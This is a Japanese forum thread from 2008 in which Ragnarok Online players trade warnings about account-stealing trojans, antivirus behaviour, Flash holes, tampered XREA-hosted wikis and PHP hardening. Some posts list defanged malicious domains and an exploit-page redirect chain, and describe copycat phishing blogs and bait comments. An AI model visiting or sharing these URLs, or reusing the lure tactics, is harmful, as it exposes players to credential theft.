793 名前:(○口○*)さん:08/08/18 00:56 ID:WfybgSF80
>>790
そんな絶対なんて事はない
rarとかだって完全なものじゃないんだから穴くらいある
書庫内容の確認を期待した物も存在するかもしれない
アクセスしたrar自体rarじゃないかもしれない

794 名前:(○口○*)さん:08/08/18 01:08 ID:SdlmdywG0
>>778の検体、McAfeeだとrar内を手動スキャンしないと検出できなかった。

ずっとMcAfee使ってたけど、カスペだとDLした時点でリアルタイムスキャンで検知してくれるのかな。
カスペのHP見る限りで実際はどうかってのはあるけど、
HPみてるとMcAfeeがいまいちコンシューマでは防御能力に不安が出る今日この頃…。

795 名前:(○口○*)さん:08/08/18 01:18 ID:AR4uZqKx0
>>794
カスペはダウンロードしたのを書込む時点で反応したよ。その分、重い訳なんだけど。

796 名前:(○口○*)さん:08/08/18 01:34 ID:BQ+qPqUA0
>>795
マシンによって使い分けてるな
DLを数多くこなすことが多いPCはカスペ
RO専用マシンはAviraを入れてる

あとどっかのスレで何も入れないってのがあったけど
危険アドレスを踏まなくても勝手にDLされる事があるとか判らないのかな
とかおもった夏でした

797 名前:(○口○*)さん:08/08/18 01:35 ID:qtdIHVK/0
>>794
マカはよく知らんけど、書庫内スキャンの設定か何かあるんでね?
ドマイナーなlzhと違ってrarはcabやzip並みに扱えんとまずいべ。

798 名前:(○口○*)さん:08/08/18 01:53 ID:qo/9E1CC0
>>794
DLするか否かのダイアログが出て自分の意思で落としてきたファイルは
自分でスキャンかけんと

基本中の基本

799 名前:(○口○*)さん:08/08/18 01:55 ID:SdlmdywG0
ID変わってるかも。794です。

>>797
手動スキャンには「zip他のアーカイブを精査する」ってのはあるけど(デフォはOFF:笑)
マカはリアルタイムでのアーカイブ精査はだめっぽい…
展開した時点で引っ掛ける自信があるからないのか、その時点で抑えればいいんじゃね?
っていうポリシーなのかは分かんないけど。
それ以前になぜ手動でもオフになってるんだろう、マカ。

>>796
exeとかを発動させるときにオンラインスキャナが検体に対応してると大体のアンチウイルスソフトはブロックできるんだろうね。
マカもそうだし。
問題なのはそのexeが多くのアンチウィルスソフトで引っ掛けられないいわゆる「ゼロディ攻撃期間」状態なのが問題なのよね。
いたちごっことはいえ、トロイ系はどこも対応が対症療法でしか対応できないのが現実だしね。

まぁ何より、今回猛威をふるってるFlashの脆弱といい、
多くのアドオンが致命的な脆弱があってもアナウンスだけのスキームで
プラグイン起動時にVerチェックやオートアップデートの構造を持たないのも問題だが。

800 名前:(○口○*)さん:08/08/18 01:59 ID:qtdIHVK/0
IE(のActiveXコントロール)はcodebaseのケツにバージョン書けば
バージョンチェックして更新されるんだけど、
Flashをいまだに9,0,0,0とか書くのやめてくれw
ネトゲの公式サイトくらい9,0,124,0にしてくれ…。

801 名前:(○口○*)さん:08/08/18 01:59 ID:SdlmdywG0
うわ、書いてみたら長文になってた。スマンorz

802 名前:(○口○*)さん:08/08/18 02:11 ID:SdlmdywG0
>>800
HP側で要求Verを書かなければ更新されないし、
古いVerがいつまでも残るから狙われるんだよね。

蔵側でプラグインが起動するときに自Verチェックして、
古ければプラグインの発行元から新Verをダウンロードできるように
すればいいと思うんだ。もちろん自衛も大事だけどね。
新VerだとHPがきちんと表示されないってなら鯖管理側も新Verで
HPを再構築すれば、旧Verは蔵も鯖もどんどん淘汰されるし。

ってネトゲの公式でもそんな実状なのか…。

803 名前:(○口○*)さん:08/08/18 03:24 ID:qtdIHVK/0
YouTubeやニコニコで9,0,124,0と指定してくれりゃ被害は大分減る気がするなぁ。
ちなみにスクエニにコードサンプルも付けてメールしたことあるけどシカトされたw

804 名前:(○口○*)さん:08/08/18 09:32 ID:rcG6v4J20
どっちかっていうと、さまざまなプラグインなどのバージョンを調べて、問題があれば
警告してくれる外部ツールが欲しいところ。

805 名前:(○口○*)さん:08/08/18 09:35 ID:FZfUOutE0
【      気付いた日時          】 2008/8/18
【不審なアドレスのクリックの有無 】 ROの職WikiTOPページを表示したくらい
【他人にID/Passを教えた事の有無】 無し
【他人が貴方のPCを使う可能性の有無】 無し
【    ツールの使用の有無      】 無し
【  ネットカフェの利用の有無    】 無し
【     OS    】 WinXP SP3
【使用ブラウザ 】 IE7
【WindowsUpdateの有無】 常に最新
【 アンチウイルスソフト 】 ウィルスバスター2008
【その他のSecurty対策 】 無し
【 ウイルススキャン結果】 カスペオンラインスキャンで「Trojan.Win32.Pakes」を検出
【スレログやテンプレを読んだか】 Yes
【hosts変更】無し
【PeerGuardian2導入】無し
【説明】 数日前からログイン時にID/PASSで弾かれる事が増え、
不審に思いカスペオンラインで検索したところ該当ファイルを検出。
格納フォルダの内容は完全に把握しており、見覚えの無いこのファイルが不審なのは確実かと。
別PCから癌、RO共にパス変更。今のところ実害無し。HDDフォーマット予定

しかしマジで身に覚えが無いんだが…フラッシュプレイヤーもアップデート済みだし。P2Pも無し
尚、直接ファイルのチェックをしても、バスター様は華麗にスルーしてくださいましたwww

806 名前:(○口○*)さん:08/08/18 10:32 ID:AR4uZqKx0
>しかしマジで身に覚えが無いんだが…フラッシュプレイヤーもアップデート済みだし。P2Pも無し

XREAの広告などに仕込まれた事例が上がっているので、怪しいアドレスを踏んでいなくても
導入wされてしまうことは十分にあり得るぞ。

807 名前:(○口○*)さん:08/08/18 11:13 ID:KLxoSma90
バスターはザルだしROとの最近相性悪くなる一方だし、利点がさっぱりない

808 名前:(○口○*)さん:08/08/18 11:43 ID:rcG6v4J20
ノートン2009がどんな感じになるかちょっと気になっていたりする。
あとWebログインになるんだったら、nPro外して欲しいよな。

809 名前:(○口○*)さん:08/08/18 11:54 ID:qtdIHVK/0
>>804
つ Secunia PSI

810 名前:(○口○*)さん:08/08/18 12:05 ID:Z9Z1sx7y0
>>808
ログイン方法変更でBOT(非正規クライアントのログイン)は
防げたとしても、チートは防げなくない?
nProないほうがうれしいけど代替になるモノでもないと思う。

811 名前:(○口○*)さん:08/08/18 12:05 ID:rcG6v4J20
>>809
d
やっぱあるんだね

812 名前:(○口○*)さん:08/08/18 17:33 ID:yDOXyFO/0
>>797
lzhがドマイナーという言い方もどうよ。
少なくとも、M$がWGA特典としてExplorerのシェル拡張を配布しているくらいにはマイナーでは無いだろう。

813 名前:(○口○*)さん:08/08/18 17:37 ID:KLxoSma90
その昔Lhasaというソフトがあってだな

814 名前:(○口○*)さん:08/08/18 17:55 ID:TboMcQ1K0
日本のWindowsじゃ大きなシェアを持っていたとしても
世界で使われている率、という点ではlzhはマイナーだと思うよ
zipとかtarとかrarとかもあるし

815 名前:(○口○*)さん:08/08/18 17:57 ID:cMi1O6dy0
それをここで議論してどうするw

816 名前:(○口○*)さん:08/08/18 19:42 ID:BQ+qPqUA0
>>805
8/18に接続したかどうかが鍵かな?
どこの職Wiki見たか覚えてないかな?

レンタルサーバー・ドメインレジストラ業者のデジロック社運用の
XREA(無料プラン)を利用してた職Wikiは以下のものがある
・雷鳥Wiki/拳聖Wiki/Common Wiki

改変騒動時雷鳥とCommonは無料から有料に移行している
後現在無料サーバー以外のXREAでも改変騒ぎが起きている。

(同社上位サーバーのCORESERVERでは改ざん等は起きていない事を付け加えておく)

817 名前:(○口○*)さん:08/08/18 22:25 ID:dLiIuyUB0
>816
ブラウザの履歴から辿れるんじゃね?

それと有料鯖でも改竄騒ぎが起きてるのなら、上記以外の職Wikiも
やられてるって事か?
xrea使ってるROの職Wiki系では、今のところ被害報告はないようだが……

818 名前:805:08/08/18 23:43 ID:UZ/cdEpgO
携帯から失礼。ちょっと説明不足でした(汗
発見したのは今日ですが、問題のファイルは8月6日作成になってました。
なので、実際に踏んだのはそれより前だと思われます

開いたページは拳聖Wiki、クルセWikiのトップ、狩場情報、ROM776、2ch、LiveRO、ちぇき14歳、くらいか…

819 名前:(○口○*)さん:08/08/19 00:34 ID:Gif/9F5+0
>>817
XREAには有料サーバ・無料サーバというのはありません。
有料・無料は広告が突っ込まれるかどうかという設定上の違いしかなく
同じサーバに同居しています。
有料だから改ざんされないということではありません。

…という趣旨の書き込みを何箇所で見たな。

# CORESERVERがどうかは知らない。
## 前回の広告改ざんの時は無料だけやられることになったけど。

820 名前:(○口○*)さん:08/08/19 01:00 ID:cjQ8oA9c0
>>805
パス入れた後不正対策やサバーとの・・・
とかでるのバスターのせいだと思ってたけど垢ハクの可能性あるのか

チェックするか
バスター使えないんだな;;更新するんじゃなかった

821 名前:(○口○*)さん:08/08/19 01:08 ID:on7xr7dI0
>>820
○○を使えば大丈夫ってことはないので、そこは勘違いしないように
どんなウイルス対策ソフトを使っていても、検出しないことはある

822 名前:まとめ臨時 ◆kJfhJwdLoM:08/08/19 05:24 ID:QuFZhRfh0
>820
自分のも先週のメンテ明けから
「不正対策が更新されました。クライアントを再起動してください。
 OKボタンを押すとクライアントが終了します。」
とキャラ選択画面に戻ろうとした時や、それで落とされた後で
ログインしなおしても何度も暫く同じメッセージが出たりします。
サーバーキャンセルもしやすくなったみたいですが…
夏休み効果なのかどうなのか…。
カスペ、バスターでは今のところは検地しませんでした。

いちおう公式からはこういう事もあるのでチェックしてくださいとの事。
http://www.ragnarokonline.jp/news/information/notice/item/7732

PG2がPerlで動くプログラムなのか判らんのですけど、
もしそうならソレも引っかかるようになったって事なのかな…とか思ったりも。
フリーソフトの常駐時計が引っかかってる可能性のほうが大きいと思いたい。
それらでもないとしたら…。

823 名前:(○口○*)さん:08/08/19 05:42 ID:tQAWC7Bu0
困った事に、そのメッセージはキャラセレ鯖が落ちているだけの場合も表示されますね。
キャラセレ鯖が一斉落ちした時などは、鯖落ちスレがそのメッセージの愚痴で埋まります。

私も頻繁ではないですが、数ヶ月前くらいからキャラパス入れた時にエラーが出ることが増えましたね。
ギルドメンバー全員もそうとのことなので、nProとかも関与してるんでしょうけども。
あまりに頻繁に出る場合は何か怪しいですが、たまに程度なら気にしなくてもいいのかもしれません。

824 名前:(○口○*)さん:08/08/19 05:51 ID:Lw2LpBJq0
>>819
XREAについてはそれで正解。
CORESERVERに関しては現在スパムブログ以外の報告はない。

前回の改ざんはXREA無料サービスに使う「広告鯖」が汚染されたから。

825 名前:(○口○*)さん:08/08/19 06:13 ID:wk0EIljo0
>>822
PG2入れててもROが起動するところを見ると違うみたいですよ。
POPFile(スパムフィルター)のようなものが起動していると、ROの起動自体が失敗し、Ragexe.exeが強制終了されます。

826 名前:(○口○*)さん:08/08/19 09:25 ID:ZNnYPXj00
ActivePerl 5.8.8.822 を入れてるけど、これが動いても落ちないよ。
だけど、Socketで何かしてるのを動かすと、ROが強制終了する。

Perlで通信しようとするとダメなのかな。

827 名前:(○口○*)さん:08/08/19 11:36 ID:fiPtfLAJ0
通信しない Perl Script を Apache経由で叩いたときにROごと落ちた気がする。

828 名前:(○口○*)さん:08/08/19 11:40 ID:KE9QBwec0
Perl対策が入った当時はコマンドラインからperl --helpとか叩いただけでROが落ちてたな。
少しは改善されたのだろうか。

829 名前:(○口○*)さん:08/08/19 12:30 ID:Gif/9F5+0
notepad.exeをperl.exeに名前変えて起動したら落ちたりして

830 名前:(○口○*)さん:08/08/19 12:31 ID:26EGMEDi0
Avira AntiVirスレに気になるのが

209 :名無しさん@お腹いっぱい。:2008/08/19(火) 12:21:20
TR/Onlinegames.ANPVってのが数箇所検出された。
オンラインゲーム関係?

俺もAntivirだから怖いんだけどどういう奴なんだろう・・・

831 名前:まとめ臨時 ◆kJfhJwdLoM:08/08/19 18:21 ID:BMITEO/x0
>>825-829
単に夏休み&お盆効果でキャラセレが重いだけで落ちている…だといいのですが。
ゲーム起動毎に一回は起きているような頻度なので何ともいい難く。

hosts対策済みでPG2にも報告にあったXREAに仕込まれていたIPは
PG2のログをみても出てこなかったので、それ関係は大丈夫かなあと思い込みます。

でも、とりあえず公式が薦める方法としてPC自体を推奨環境にするとか
クライアントの再インストールがあるので再インストをやってみる事にしました。
再インスト前にチェックディスクとかカスペやらも。

832 名前:(○口○*)さん:08/08/19 20:56 ID:cjQ8oA9c0
ウィルスバスターのなおったかも
めずらしく1回で入れた

833 名前:(○口○*)さん:08/08/19 21:23 ID:wk0EIljo0
>>832
他のスレでは、直った→やっぱりダメぽい という報告が上がっていた。
バスター2008落ちの頻度は落ちたかもしれないが、根本的な解決にはなってない模様。

834 名前:(○口○*)さん:08/08/19 21:24 ID:KE9QBwec0
そもそもGameGuardは更新されてない

835 名前:(○口○*)さん:08/08/19 21:52 ID:wk0EIljo0
サーバー側のタイムアウトの設定次第でどうにでもなりそうな気がするよね。
一定時間nProの通信が遅延した時に落とされる挙動に似てるし。

836 名前:(○口○*)さん:08/08/20 14:46 ID:/ppJA0/h0
URLをコピペしたら悪質サイトに――乗っ取り被害が続出
http://www.itmedia.co.jp/news/articles/0808/20/news033.html

Flash旧バージョンの穴をついている模様?
広告が汚染されている恐れありと。

837 名前:(○口○*)さん:08/08/20 19:51 ID:zv6iwY1Z0
なんかどっかで聞いたような手口だなw

838 名前:(○口○*)さん:08/08/20 19:53 ID:qw1npiVi0
おっと、xreaの悪口はそこまでだ。

839 名前:(○口○*)さん:08/08/20 21:53 ID:7U+enijE0
クリップボードはomanchinかw

840 名前:(○口○*)さん:08/08/20 22:41 ID:bJPlFZqD0
iswebのHPにアクセスしたら、こんなメッセージが。
なんか仕込まれて慌てて対策中なのかな?

|iswebをご利用のみなさまへ
|現在、インフォシーク iswebホームページサービスにおいて、緊急メンテナンスを実施させていただいております。

|メンテナンス中は、ページの閲覧等、ホームページサービスをご利用いただくことが出来ません。恐れ入りますが、何卒ご了承くださいませ。

|メンテナンスが終了次第、サービスを再開させていただきます。
|ご利用の皆様にはご迷惑をおかけいたしますことを深くお詫び申し上げます。
|何卒ご理解、ご協力賜りますよう、よろしくお願い申し上げます。

|楽天株式会社

841 名前:(○口○*)さん:08/08/20 22:49 ID:hwDm675n0
infoseek系サイトは日中から死ぬほど重くなってたね
なにがあったのやら

842 名前:(○口○*)さん:08/08/20 22:50 ID:ocskpuVl0
http://pc11.2ch.net/test/read.cgi/hosting/1212395975/
絶不調なだけぽい?具体的な発表待ちかもね
警戒心があるのはいいことだけどなんでもそっちに繋げて変な噂は立てないようにな

843 名前:(○口○*)さん:08/08/21 00:08 ID:DMgaznWt0
>>836
クリップボードに何かをコピーするのは、通常の Flash の機能なのかな。
だったら最新版でも危ないかも。

844 名前:(○口○*)さん:08/08/21 01:21 ID:FlbbgweW0
>>843

Macも被害ってところがポイントだな。
Flash・・・Adobeになってから脆弱性ネタ尽きないな

845 名前:(○口○*)さん:08/08/21 01:39 ID:SKtkPG7N0
付随物に権限与えすぎたせいだな

846 名前:(○口○*)さん:08/08/21 09:03 ID:QXG1WYWR0
GUNGHO-1:211.13.241.0-211.13.241.127
↑先週のメンテで一部鯖のアドレスに使われてるらしいんだけどあってる?

847 名前:(○口○*)さん:08/08/21 13:35 ID:9StQCVqT0
>>846
Loki/Iris/Fenrirがそのネットワークに収容された。

848 名前:FFXI(仮):08/08/21 17:56 ID:NgLmkfQs0
このブログは下記の理由などにより凍結されています。
規約上の違反があった
多数のユーザーに迷惑をかける行為を行った。

\(^o^)/
今までご利用ありがとうございました。

849 名前:(○口○*)さん:08/08/21 18:28 ID:6QD73Xjk0
host制限についての質問です

host制限されているドメインへの接続はIEファイヤーフォックス関係なく接続制限でしょうか?

あるアドレスを調べて危険度判定は出ませんでしがファイルをダウンロード可能と出てうっかりクリックしてしまいました
ファイヤーフォックスはアクセス不可と出ましたがこれはhost制限に対する動きと解釈でよろしいですか?
(そのドメインはhost制限に追加されていました)

普段から危険アドレスやドメインをチェックしてましたがこんな初歩的なミスをするとは情けないです

ご存知の方は書き込みお願いします

850 名前:(○口○*)さん:08/08/21 18:32 ID:kJubNWyM0
そだよん♪

851 名前:(○口○*)さん:08/08/21 18:41 ID:z8nMY2JB0
複数のアカウントを持ってて、全て同じギルドに入れてるんだけど
今日夕方頃狩りをしてたら、狩りをしてない方のアカウントで
「ギルド員、○○(キャラクター名)が終了しました」「ギルド員、○○が終了しました」……と
一つのアカウントの5キャラ全て、一定の間隔で終了メッセージが出た。
あわててそのアカウントに入って確認したけどお金もアイテムも取られてなかった。
とりあえず5キャラともパスワード変えて、別アカウントもパスワード変更したけど、
これってやっぱり垢ハックだろうか、それとも今日ガンホーが裏でやってた更新に関係することだろうか。

852 名前:(○口○*)さん:08/08/21 18:43 ID:n5talm7d0
>>851
いい確率でアカハク業者の下調べだな。

853 名前:(○口○*)さん:08/08/21 18:52 ID:kJubNWyM0
>>それとも今日ガンホーが裏でやってた更新に関係することだろうか。
RO関係ないだろ、頼むからあれこれ混同すんなよ

854 名前:(○口○*)さん:08/08/21 18:53 ID:5flilgQ20
>849
hostsに 127.0.0.1 hogehoge.com な形で登録されてたのなら、ブロック出来てる。

>851
パス変えるのはいいが、その変えたPCが汚染してる可能性は無いのか?
もしトロイがそのPCに居るなら、変更したパスも中華に筒抜け。
それどころか、警戒されたと向こうに教えたことになるから、即ハクりにくる可能性もある。

もし安全と確信できる環境から変更したのでないなら、要注意。
急いで安全な環境から再度変更した方がいい。

855 名前:(○口○*)さん:08/08/21 19:01 ID:6QD73Xjk0
>>850さん
>>854さん
ありがとうございます

hoetsにはその様に追加されていました
(リネージュ資料室さんのリストを定期的にhostsに更新しています)

念の為ににカスペでフルチェック中です
初歩的な質問にお答え頂きありがとうございました

856 名前:(○口○*)さん:08/08/21 19:12 ID:uraqEDmg0
PG2を導入しようと
「Software translated into Japanese: 日本語化ソフトウェア」
のページの
「PeerGuardian 2 for Windows β6b 日本語第2版 2000・XP・2003用」
のリンクをクリックしたんだが、リンクが死んでる様子
Operaで「リモートサーバーが見つかりません」、IEでも「ページを表示できません」と出る

他に配布してるサイトない?

857 名前:(○口○*)さん:08/08/21 19:22 ID:GPqpS/k50
「PeerGuardian 2」でぐぐったTOPからも落とせた訳だが…確かにそこは500エラーで落とせないな。

858 名前:851:08/08/21 19:24 ID:z8nMY2JB0
>>852 >>853 >>854 ありがとう
アカウントハック前提に対処することにします。
まずは汚染されてない(はずの)PCでパスワード再変更かな。

859 名前:(○口○*)さん:08/08/21 19:24 ID:SKtkPG7N0
>>856
www.archive.orgにそのダウンロード先のURLを突っ込んで
キャッシュから拾える。
8月上旬からダメになってるようだ。↓参照
ttp://www.geocities.jp/ff11warning/pg2/install.html

860 名前:(○口○*)さん:08/08/21 19:26 ID:uraqEDmg0
>>857
>>859
ありがとう

861 名前:(○口○*)さん:08/08/21 19:44 ID:GPqpS/k50
>>858
それがいいと思う。あと、危険と思われるPCの再インストールと平行して、汚染されていない筈のPCのチェックも忘れずに。

862 名前:まとめ臨時 ◆kJfhJwdLoM:08/08/21 19:59 ID:c2RRtHjm0
>>848
そんな、いったい何がッ!素人にも判りやすい解説で
あの罠情報は有用であれ迷惑って事はないと思うのだけど…。

規約のほうで何か引っかかったのか、
それとも頭の沸いた業者らへんがメールでも送ったのかな…。
FC2も酷い。

今までありがとうございました。

863 名前:(○口○*)さん:08/08/21 22:02 ID:hMJ9V7ik0
告知突っ込めスレより転載

公式とXREAで運用されてる職Wikiで共にPHPのエラーがリモートで出てしまっている。
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1218845613/227,229


Wikiのほうは現在その手の問題は出ていないが時々link.php関連の処理で問題が出ている
ドメインを付与しているので情報だけを書き出すと s261.xrea.com
ドメイン末尾はinfo

864 名前:(○口○*)さん:08/08/21 22:06 ID:5WU8YZr80
permission denied で fopen 失敗とは穏やかじゃないなぁ。
ファイルの所有者変更されてたりしないかね。

865 名前:(○口○*)さん:08/08/21 22:44 ID:qL1f4lr/0
>>863
過去何十回もその表示を見ているんだが・・・

866 名前:(○口○*)さん:08/08/21 23:10 ID:hMJ9V7ik0
Warning: preg_match_all() [function.preg-match-all]: Compilation failed: reference to non-existent subpattern at offset 25 in /virtual/おそらくユーザー名/public_html/link.php on line 208

Wikiのほうがこれだな。
設置者がだめぽ過ぎ?

867 名前:(○口○*)さん:08/08/21 23:11 ID:lQSA1+hr0
向こうのスレのレスまで読まないと流れが掴めないかもしれないけど、要は、エラーメッセージが出力されること自体が
問題視すべきこと。
恐らくは、php.ini内でdisplay_errors = on の設定がなされているか、index.phpでini_setが行われているのだと思われるが。
PHPの大本営でも、本番環境では上記項目をoffに設定することを推奨している。
ttp://jp2.php.net/manual/ja/errorfunc.configuration.php#ini.display-errors

868 名前:(○口○*)さん:08/08/21 23:24 ID:hMJ9V7ik0
XERA?
ttp://www.mmobbs.com/uploader/files/5436.jpg

公式(8/14・何処かの質問スレ用のもの)
ttp://www.mmobbs.com/uploader/files/5399.jpg

869 名前:(○口○*)さん:08/08/21 23:46 ID:NgLmkfQs0
うわ…エラー生で出すなよ…。

870 名前:(○口○*)さん:08/08/21 23:55 ID:UwhtdS5O0
Wikiの方は管理人に連絡すべき事で、ここで書く事じゃないと思うが。

>867
php.iniって事は、xreaに言わないとダメなんじゃ?

871 名前:(○口○*)さん:08/08/22 01:45 ID:tSn0ThLt0
>>862
暫定ですが、拍手でURI送りましたです。

872 名前:RAGWalker ◆YimRag/CBY:08/08/22 07:51 ID:5Cr1XtVn0
おはようございます。
貧スレWiki管理人です

管理Blogにも書いてましたがこちらにも記載しておきます。

MLにてBSWikiの中の人から対象法などを教えていただいて
PHPのエラーメッセージをはかない様に対処いたしました。

半ば私のスキルのなさで起きた事なので精進致したいと思います。

あと、BSWikiの中の人が現在BBQの誤爆に巻き込まれているので
書き込みできないのでML転載という形でかいておきます。

> 【LiveROせきゅスレの件】
> 原因はriskystr.pl側に有ります。記述が間違っていたのです。
> 修正したのでriskystr.plを利用している方は最新のものに更新されるよう
> お願いします。

873 名前:(○口○*)さん:08/08/22 09:57 ID:GrAVodmM0
福建中華は最近はこういうテンプレコメントであちこち爆撃しているようだよ。
"【RO (日付)】ペンギンが戦場で挫折したようです。前編"
オリジナル文はニコ動のRO 5/11の奴だな、日付部分が7月とかになってる奴は中華の罠と思って間違いない。
書き込んでいるのは手持ちドメインgameicity。

気を付けてくれよな!

874 名前:(○口○*)さん:08/08/22 13:23 ID:jMAsny7U0
ゲームは違えど業者の動きをチェックできるからこういうとこも見てた方がいい・・・かな?
こっちはかなり業者が暴れてるっぽい。対岸の火事とは言えないね
●● RMT業者の垢ハックが多発している件37 ●●
ttp://changi.2ch.net/test/read.cgi/ogame/1219176652/

875 名前:(○口○*)さん:08/08/22 15:24 ID:tSn0ThLt0
ネ実はいくつか前の既出だから見てる人は見てる。

876 名前:(○口○*)さん:08/08/22 17:03 ID:I/qlK6S40
【      気付いた日時          】先ほど
【不審なアドレスのクリックの有無 】 有。himeyuz■exblog■jp
【他人にID/Passを教えた事の有無】 無
【他人が貴方のPCを使う可能性の有無】 無
【    ツールの使用の有無      】 無
【  ネットカフェの利用の有無    】 無
【     OS    】 WindowsXP HOME EDITION WITH SP2
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 更新済み
【 アンチウイルスソフト 】 McAfee
【その他のSecurty対策 】 無
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンにて5個C:\Documents and Settings\ \Local Settings\Temporary Internet Files内で検出
【スレログやテンプレを読んだか】 ざっと読んだ程度
【hosts変更】 不明
【PeerGuardian2導入】 無
【説明】
上記のブログを見に行って画像を開いたところでマカフィーが反応。
トロイはブロックされたようです。
続いてカスペのオンラインスキャンをしたところ、上記のフォルダに5つ検出したので全て削除済み。
現在再度オンラインスキャン中。
一応携帯でパスワード変更済み。
これ以降、スキャンで出てこなくても隠れて悪さをすることは考えられるでしょうか?
リカバリー出来たらしたいのですが、諸事情により出来ません。

877 名前:(○口○*)さん:08/08/22 17:13 ID:tSn0ThLt0
www■teamerblog■com/blog/
かなり古いからIEのキャッシュ削除で終了じゃない?

878 名前:(○口○*)さん:08/08/22 20:47 ID:R0WVyMve0
先日改竄を受けたXREA系サイトで被害再発。
>>874のスレから引用。

353 名前: 黒魔メモの人 [sage] 投稿日: 2008/08/22(金) 20:07:36 ID:1dgPtflc
スクリプトが仕込まれていたので修正しました。
報告してくれた方ありがとうございました。

今回仕込まれたのはindex.phpで、
pukiwiki.phpは触られた形跡がありますが
怪しい点はありませんでした。

・前回からの変更点
FTPパスは変更済み
ccessで以下のflag?をoff、いくつかのIPをdenyで制限
php_flag allow_url_fopen off
php_flag allow_url_include off
php_flag register_globals off

他に対策をご存じの方居ましたら教えて頂けると有り難いです…orz

879 名前:(○口○*)さん:08/08/22 20:59 ID:5Cr1XtVn0
>>878
PHPのエラーメッセージを出る状態で放置してた人間が言うのもなんですが・・・。
対策を行わないとXREAの場合PHP5はエラーメッセージをはいてしまうようです。

>>868のようなssでも貧スレWikiのルートパス等完全に相手の手の内に判り
攻撃のヒントすら与えている状態です。

あのssはモザイクがかかってるのでかろうじてユーザアカウントががわからないのですが
やろうと思えば貧スレWikiのクラックは可能と思います。
サーバーとアカウント名がわかるXREAのユーザアカウントはたぶん入れてしまうんじゃないかと思います。

サーバー移動しか方法がないかもしれません。

880 名前:(○口○*)さん:08/08/22 21:59 ID:6xJ0hwHI0
php.iniに手が出せない場合には、.htaccessにディレクティブを追加するのが手っ取り早いか。
一例としては、こんな感じで。
> php_flag display_errors off
> php_value error_log "/virtual/{username}/logs/php_error.log"

>>879
XREAも、以前のようにマスタータンが直々に管理していた時代と、今の外部委託投げっぱなしの現状は、まるで別物と
考えた方が良いかもしれません。
zmxのように無料サービス自体を撤廃するレンタル鯖も珍しくないですし。

881 名前:(○口○*)さん:08/08/22 22:02 ID:GrAVodmM0
>>876の奴はかなり以前から存在している中華のパクリブログのようだ。
全く同名、同一自己紹介のブログがFC2に存在しておりこちらは現在も更新されている。

”RO★Cafe 姫神ゆず”で検索すると、オリジナルと876のパクリブログが出る。
パクリブログのブログ管理者名はいかにも中華な gguuyag だし。

エキサイト運営への通報が妥当。
まだまだこう言うパターンのパクリブログは地雷の如く残っているだろう。
(これはと思ったブログをマークし、数日後にパクリブログ開設、その時点での最新記事をパクって罠を仕込んでいく手口)
その例を一つ、中身は同じだからタイトルと書いた時間。
【オリジナル】
SSでお楽しみください。  2007/12/18(Tue)22:38 

【中華パクリ】
SSでお楽しみください。  by gguuyag | 2007-12-19 18:08

ともあれ気をつけてくれよな!

882 名前:まとめ臨時 ◆kJfhJwdLoM:08/08/22 22:46 ID:+PX3vLnU0
>>871
確認しましたー。ありがとうございます。

883 名前:(○口○*)さん:08/08/22 23:36 ID:LeMm3o4t0
XREAはもうダメなんじゃないかとすら思えてくる。
職スレあたりクラックされたら被害甚大だな…。

884 名前:(○口○*)さん:08/08/22 23:41 ID:5Cr1XtVn0
>>883

職スレ以外もありますしねー。
といってもいくつか他のサーバ(サクラの再販等)も同じような状態らしいので
移住サーバーにも実は困る状態というのが現状ですね。

885 名前:(○口○*)さん:08/08/23 00:42 ID:LztQAW7a0
絶対安全なんてところはもうないだろう
何処でも狙われたら危険性をもつサイトに変わるしね

886 名前:(○口○*)さん:08/08/23 15:58 ID:Qn/HI2mf0
exciteいって>>881のブログ通報してきた。
だいぶ放置っぽいね

887 名前:(○口○*)さん:08/08/23 22:13 ID:xasVReh40
Windows更新したあとに再起動したら
カスペルのFWがrundll32.exeに反応したんだけど
これって許可しちゃっていいのかな

888 名前:(○口○*)さん:08/08/23 22:26 ID:ZR0nzABA0
そりゃ、ファイルが更新されてたら警告出すだろ。

WindowsUpdateで更新した覚えがあるなら許可。
いつどこで更新したか記憶がないなら禁止。

889 名前:(○口○*)さん:08/08/23 22:37 ID:xasVReh40
なるほど
勉強になりました
ありがとう!

890 名前:(○口○*)さん:08/08/24 02:22 ID:00uwA+Yz0
告知ツッコミスレに爆撃

-----------------------------
325 名前:(^ー^*)ノ〜さん MAIL: 投稿日:08/08/24 01:40 ID:scTbnZyg0
ROの小説やイラストを公開しております。
2次職が活躍する小説と転生職が活躍する小説を連載中です!
サイトリニューアルしましたので是非お越しを〜
http://yaplog■jp/kaosatu/
-----------------------------
327 名前:(^ー^*)ノ〜さん MAIL:sage 投稿日:08/08/24 02:21 ID:xEp0jDJX0
>325はアカハックアドレスなので注意

yaplog■jp/kaosatu/
--->www■infosueek■com/ff11diary
----->www■infosueek■com/xin/Ms06014tt■htm
----->www■infosueek■com/xin/Ms06046tt■htm
----->www■infosueek■com/xin/Yahoott■htm
----->www■infosueek■com/xin/Ms07004tt■js
-----------------------------

891 名前:(○口○*)さん:08/08/24 04:11 ID:4rZXREnU0
xia.exeか…6月製造の化石だなぁ。

892 名前:(○口○*)さん:08/08/24 11:33 ID:Bo3yWvaR0
チラ裏に貼られていたもの

857 (○口○*)さん New! 08/08/24 11:01 ID:fJeVjjp90
”最近のボットの動向/情勢教えて!”の回答集(以前RO内にてご質問した分)
http://yaplog■jp/siinya/

iframeでhttp://www■infosueek■com/ff11diary
以下同上だね

893 名前:(○口○*)さん:08/08/24 12:20 ID:JH8TGYXU0
最近FF11関連が人気だな

894 名前:(○口○*)さん:08/08/24 14:56 ID:+NnfJRk60
>>892
コメント自体は年初から爆撃で使われているようだよ。
ブログ記事のタイトルパクった中華のテンプレコメントってことだね。
これを検索、一番最初に原文が出る。
””最近のボットの動向/情勢教えて!”の回答集(以前RO内にてご質問した分)”
残りは皆爆撃コメ、と。
当初はinfosueek直接記述だったみたいだね。

ヤプログの方はやっぱりプロフィール欄の下の細長い線があるね。OperaとFirefox3だと見えるよ。
殆どの奴はお人好しな程に無警戒だからこんなコメントにも引っかかるんだろうな。
しばらくすると足跡返しコメントが来るぜ。
他の中華ヤプログでもそれこそ気軽に足跡返しコメントのこしてる奴もいるし。
これだけ無警戒なら1年くらい前のパクリコメントでもハックが簡単、中華ウハウハで止められないぜ。
ヤプログの他の中華ブログも通報して半月はたったが未だに削除すらされない、こりゃもうダメだね。

気を付けてくれよな!

895 名前:(○口○*)さん:08/08/25 00:46 ID:S5/BU9To0
>893
